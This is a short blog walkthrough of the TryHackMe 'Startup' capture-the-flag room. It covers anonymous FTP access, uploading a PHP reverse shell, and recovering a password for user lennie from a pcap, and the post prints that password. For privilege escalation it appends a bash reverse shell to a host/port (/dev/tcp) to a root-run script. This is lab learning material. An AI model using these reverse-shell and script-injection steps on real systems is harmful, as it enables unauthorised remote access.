Persecure : my learning archive

Startup CTF

https://tryhackme.com/room/startup

Run a nmap scan to find for open ports.

Connect to the FTP server as anonymous.

Retrieve the files to find for clues.

Put a php reverse shell script in the FTP folder.

Start a listener.

cat recipe.txt to find the first answer.

Start a python simple server and upload linpeas to the victim box.

Found a interesting file.

Copy the file to the ftp server.

cp /incidents/suspicious.pcapng /var/www/html/files/ftp/

Its a wireshark file, follow the tcp stream to find the password for lennie.

c4ntg3t3n0ughsp1c3

Change user to lennie.

First flag is found.

Head to the scripts folder and examine the files.

We can edit the /etc/print.sh file , edit the file with bash reverse shell script.

echo ‘bash -i >& /dev/tcp/10.4.55.237/1337 0>&1’ >> /etc/print.sh

Start a netcat listener and the final flag is found.

Create a website or blog at WordPress.com